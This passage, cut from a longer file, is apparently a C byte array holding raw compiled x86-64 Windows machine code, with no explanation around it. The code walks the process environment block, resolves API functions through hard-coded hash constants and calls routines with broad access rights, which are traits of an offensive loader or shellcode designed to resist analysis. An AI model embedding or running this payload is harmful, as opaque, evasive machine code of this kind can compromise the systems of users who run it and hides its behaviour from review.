x00,0xC7,0x85,0xF8,0x0B,0x00,0x00,0x02,0x00,0x00,0x00,0x48,0xC7,0x85,0xF0,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x00,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x08,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x38,0x0C,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x10,0x48,0x89,0xC1,0xE8,0xCD,0x72,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0xEB,0x03,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x30,0x0C,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x10,0x48,0x89,0xC1,0xE8,0x8E,0x72,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0xAF,0x03,0x00,0x00,0x48,0xC7,0x85,0x18,0x0C,0x00,0x00,0xF8,0x00,0x00,0x00,0x48,0x8D,0x8D,0x18,0x0C,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x28,0x0C,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x08,0xC7,0x44,0x24,0x20,0x04,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x1F,0x00,0x0F,0x00,0x48,0x89,0xC1,0xE8,0x07,0x6D,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0x53,0x03,0x00,0x00,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x8D,0x8D,0x20,0x0C,0x00,0x00,0xC7,0x44,0x24,0x48,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x01,0x00,0x00,0x00,0x48,0x8D,0x95,0x10,0x0C,0x00,0x00,0x48,0x89,0x54,0x24,0x30,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0xC7,0xC2,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x2F,0x75,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0xE7,0x02,0x00,0x00,0x48,0x8D,0x95,0x4C,0x0C,0x00,0x00,0x8B,0x85,0x90,0x0C,0x00,0x00,0x89,0xC1,0xE8,0xDF,0xFB,0xFF,0xFF,0x89,0x85,0x5C,0x0C,0x00,0x00,0x83,0xBD,0x5C,0x0C,0x00,0x00,0x00,0x0F,0x84,0xC3,0x02,0x00,0x00,0x8B,0x85,0x90,0x0C,0x00,0x00,0x48,0x89,0x85,0xD0,0x0B,0x00,0x00,0x8B,0x85,0x4C,0x0C,0x00,0x00,0x89,0xC0,0x48,0x89,0x85,0xD8,0x0B,0x00,0x00,0x48,0x8D,0x8D,0xD0,0x0B,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x40,0x0C,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5A,0x74,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0x6F,0x02,0x00,0x00,0x48,0x8D,0x95,0x50,0x05,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x1F,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0xC7,0x85,0x50,0x05,0x00,0x00,0xF8,0x00,0x00,0x00,0x48,0x8D,0x85,0x20,0x0B,0x00,0x00,0x48,0x89,0x85,0xF8,0x05,0x00,0x00,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x89,0x85,0x20,0x06,0x00,0x00,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x89,0x85,0x18,0x06,0x00,0x00,0xC7,0x85,0x00,0x06,0x00,0x00,0x05,0x40,0x00,0x80,0xC7,0x85,0x38,0x06,0x00,0x00,0x01,0x00,0x00,0xC0,0xE8,0x8D,0x0A,0x00,0x00,0x89,0x85,0x40,0x06,0x00,0x00,0x8B,0x85,0x90,0x0C,0x00,0x00,0x89,0x85,0x54,0x05,0x00,0x00,0x48,0x8B,0x85,0x98,0x0C,0x00,0x00,0x48,0x89,0x85,0x08,0x06,0x00,0x00,0x8B,0x85,0x4C,0x0C,0x00,0x00,0x89,0x85,0x58,0x05,0x00,0x00,0x48,0x8B,0x85,0x40,0x0C,0x00,0x00,0x48,0x89,0x85,0x10,0x06,0x00,0x00,0x48,0x8D,0x55,0xD0,0xB8,0x00,0x00,0x00,0x00,0xB9,0xAF,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x66,0xC7,0x45,0xD2,0x78,0x05,0x66,0xC7,0x45,0xD0,0x50,0x05,0xC7,0x45,0xF8,0x00,0x00,0x00,0x20,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x89,0x45,0x08,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x89,0x45,0x18,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x89,0x45,0x10,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x89,0x45,0x20,0x48,0x8B,0x85,0x08,0x06,0x00,0x00,0x48,0x89,0x45,0x28,0x48,0x8B,0x85,0x10,0x06,0x00,0x00,0x48,0x89,0x45,0x30,0x8B,0x85,0x54,0x05,0x00,0x00,0x89,0x45,0x04,0x48,0x8B,0x05,0xF3,0x4D,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x78,0x05,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xEC,0x4D,0x01,0x00,0xFF,0xD0,0x48,0x89,0x85,0x60,0x0C,0x00,0x00,0x48,0x83,0xBD,0x60,0x0C,0x00,0x00,0x00,0x0F,0x84,0x26,0x01,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x66,0xC7,0x40,0x02,0x78,0x05,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x66,0xC7,0x00,0x50,0x05,0x48,0x8B,0x85,0x20,0x0C,0x00,0x00,0x48,0x8D,0x95,0x50,0x05,0x00,0x00,0x41,0xB8,0xF8,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x90,0xAB,0x00,0x00,0x48,0x8B,0x95,0x60,0x0C,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC1,0xE8,0x72,0xF7,0xFF,0xFF,0x89,0x85,0x5C,0x0C,0x00,0x00,0x83,0xBD,0x5C,0x0C,0x00,0x00,0x00,0x0F,0x84,0xCE,0x00,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x8B,0x40,0x2C,0x85,0xC0,0x0F,0x88,0xBF,0x00,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x8B,0x40,0x28,0x3D,0x02,0x00,0x00,0x20,0x0F,0x85,0xAD,0x00,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x8B,0x40,0x30,0x89,0xC0,0x48,0x89,0x85,0x50,0x0C,0x00,0x00,0x48,0x83,0xBD,0x50,0x0C,0x00,0x00,0x00,0x0F,0x84,0x8F,0x00,0x00,0x00,0x48,0x8B,0x85,0x50,0x0C,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x35,0x66,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x81,0xBD,0x58,0x0C,0x00,0x00,0x02,0x01,0x00,0x00,0x74,0x2B,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x78,0x22,0x81,0xBD,0x58,0x0C,0x00,0x00,0xC0,0x00,0x00,0x00,0x74,0xBF,0x81,0xBD,0x58,0x0C,0x00,0x00,0x01,0x01,0x00,0x00,0x74,0xB3,0xC7,0x85,0x58,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0xE8,0x18,0x07,0x00,0x00,0x89,0x85,0x5C,0x0C,0x00,0x00,0xC7,0x85,0x6C,0x0C,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0x40,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x40,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2D,0x61,0x00,0x00,0x48,0x8B,0x85,0x20,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x1C,0x48,0x8B,0x85,0x20,0x0C,0x00,0x00,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x39,0x72,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x60,0x00,0x00,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCF,0x60,0x00,0x00,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB4,0x60,0x00,0x00,0x48,0x8B,0x85,0xC8,0x0B,0x00,0x00,0x48,0x85,0xC0,0x74,0x1E,0x48,0x8B,0x85,0xC8,0x0B,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE3,0xF1,0xFF,0xFF,0x48,0x8B,0x85,0xC8,0x0B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x60,0x00,0x00,0x48,0x83,0xBD,0x60,0x0C,0x00,0x00,0x00,0x74,0x53,0x48,0x83,0xBD,0x60,0x0C,0x00,0x00,0x00,0x74,0x49,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x41,0xB8,0x78,0x05,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAE,0xA9,0x00,0x00,0x48,0x8B,0x05,0x9F,0x4B,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x60,0x0C,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9C,0x4B,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0x60,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x6C,0x0C,0x00,0x00,0x48,0x81,0xC4,0xF8,0x0C,0x00,0x00,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xB9,0xFF,0xFF,0xFF,0xFF,0x48,0x8B,0x05,0x09,0x4B,0x01,0x00,0xFF,0xD0,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x28,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0x48,0x8B,0x05,0xAE,0x4B,0x01,0x00,0xFF,0xD0,0x83,0xC0,0x02,0x89,0x45,0xFC,0x8B,0x5D,0xFC,0x48,0x8B,0x05,0xFC,0x4A,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF8,0x4A,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xA9,0x00,0x00,0x00,0x4C,0x8B,0x45,0xE8,0x8B,0x55,0xFC,0x48,0x8B,0x4D,0x20,0x48,0x8B,0x45,0xF0,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD8,0xB8,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xDA,0xA8,0x00,0x00,0x89,0xC3,0xB9,0xF5,0xFF,0xFF,0xFF,0x48,0x8B,0x05,0xA4,0x4A,0x01,0x00,0xFF,0xD0,0x48,0x89,0xC1,0x48,0x8B,0x45,0xF0,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0x89,0xD8,0x48,0x89,0xC2,0x48,0x8B,0x05,0xD7,0x4A,0x01,0x00,0xFF,0xD0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xFC,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5F,0xA8,0x00,0x00,0x48,0x8B,0x05,0x50,0x4A,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x50,0x4A,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0xE8,0xB2,0x5D,0x00,0x00,0x48,0x89,0x45,0xF0,0xC7,0x45,0xD4,0x60,0x00,0x00,0x00,0x8B,0x45,0xD4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0xEB,0x59,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x39,0xD0,0x72,0x36,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x40,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0xF0,0x48,0x39,0xC2,0x73,0x19,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x60,0x48,0x8B,0x45,0x10,0x48,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x1E,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xD8,0x75,0x9D,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x70,0xFF,0xFF,0xFF,0x0F,0x11,0x45,0x80,0x0F,0x11,0x45,0x90,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x40,0xFF,0xFF,0xFF,0x0F,0x11,0x85,0x50,0xFF,0xFF,0xFF,0x66,0x0F,0xD6,0x85,0x60,0xFF,0xFF,0xFF,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xD3,0xC9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0x20,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x20,0x0E,0xAE,0x06,0x48,0x89,0xC1,0xE8,0x5E,0x1E,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x48,0x02,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x9D,0xC9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1A,0x20,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1D,0x21,0x88,0x03,0x48,0x89,0xC1,0xE8,0x28,0x1E,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x15,0x02,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x67,0xC9,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE4,0x1F,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x56,0x43,0xDD,0x7B,0x48,0x89,0xC1,0xE8,0xF2,0x1D,0x00,0x00,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0xE2,0x01,0x00,0x00,0x48,0x8D,0x45,0xC0,0x48,0x89,0xC1,0xE8,0x21,0xFE,0xFF,0xFF,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x0F,0x84,0xCC,0x01,0x00,0x00,0x48,0x8B,0x05,0x2D,0x48,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x26,0x48,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xA0,0x01,0x00,0x00,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x8D,0x15,0xFE,0xC8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x54,0xA6,0x00,0x00,0x48,0x8B,0x55,0xC0,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x36,0xA6,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0xA8,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4D,0xA2,0x00,0x00,0x66,0x89,0x45,0xA0,0x0F,0xB7,0x45,0xA0,0x01,0xC0,0x66,0x89,0x45,0xA0,0x0F,0xB7,0x45,0xA0,0x83,0xC0,0x02,0x66,0x89,0x45,0xA2,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0x88,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0x45,0x80,0x48,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x70,0xFF,0xFF,0xFF,0x48,0x8D,0x45,0xB8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x04,0x00,0x48,0x89,0xC1,0xE8,0x97,0x63,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x88,0xE6,0x00,0x00,0x00,0x48,0x8D,0x85,0x40,0xFF,0xFF,0xFF,0x4C,0x8B,0x45,0xD8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x0F,0x84,0xC6,0x00,0x00,0x00,0x48,0x8D,0x85,0x40,0xFF,0xFF,0xFF,0x4C,0x8B,0x55,0xD0,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x0F,0x84,0x9A,0x00,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x8D,0x95,0x40,0xFF,0xFF,0xFF,0x4C,0x8B,0x4D,0xE0,0x49,0x89,0xD0,0xBA,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD1,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x74,0x77,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x7A,0x5B,0x00,0x00,0x89,0x45,0xEC,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x78,0x5D,0x48,0x8D,0x95,0x70,0xFF,0xFF,0xFF,0x48,0x8D,0x45,0xB8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x01,0x00,0x48,0x89,0xC1,0xE8,0xDA,0x62,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x3C,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0xD8,0x64,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x2A,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xB8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0xF0,0x5A,0x00,0x00,0x48,0x83,0x7D,0xF0,0x00,0x74,0x54,0x48,0x83,0x7D,0xF0,0x00,0x74,0x4D,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x78,0xA4,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x10,0xA4,0x00,0x00,0x48,0x8B,0x05,0x01,0x46,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x01,0x46,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0x46,0x46,0x01,0x00,0xFF,0xD0,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x2C,0x01,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x5D,0xF8,0x48,0x8B,0x05,0x7C,0x45,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x78,0x45,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x53,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x41,0x89,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x77,0xC6,0x00,0x00,0x48,0x89,0xC1,0xE8,0x93,0x00,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x31,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x78,0xC6,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC0,0xF9,0xFF,0xFF,0x48,0x8D,0x05,0x88,0xC6,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB1,0xF9,0xFF,0xFF,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x47,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE7,0xA2,0x00,0x00,0x48,0x8B,0x05,0xD8,0x44,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD8,0x44,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x48,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xEF,0xC5,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x1B,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x0B,0x60,0x9C,0x2F,0x48,0x89,0xC1,0xE8,0xF8,0x19,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x2A,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x4C,0x8B,0x4D,0xF0,0x41,0x89,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD1,0x89,0x45,0x20,0x83,0x7D,0x20,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xF0,0x60,0x00,0x00,0x00,0x8B,0x45,0xF0,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x05,0x76,0x1B,0xB8,0x20,0x03,0xFE,0x7F,0x48,0x8B,0x00,0xBA,0x04,0x00,0xFE,0x7F,0x8B,0x12,0x89,0xD2,0x48,0x0F,0xAF,0xC2,0x48,0xC1,0xE8,0x18,0xEB,0x1A,0xB8,0x00,0x00,0xFE,0x7F,0x8B,0x00,0x89,0xC2,0xB8,0x04,0x00,0xFE,0x7F,0x8B,0x00,0x89,0xC0,0x48,0x0F,0xAF,0xC2,0x48,0xC1,0xE8,0x18,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x57,0x53,0x48,0x81,0xEC,0x60,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x00,0x02,0x00,0x00,0x48,0x89,0x95,0x08,0x02,0x00,0x00,0xC7,0x85,0xDC,0x01,0x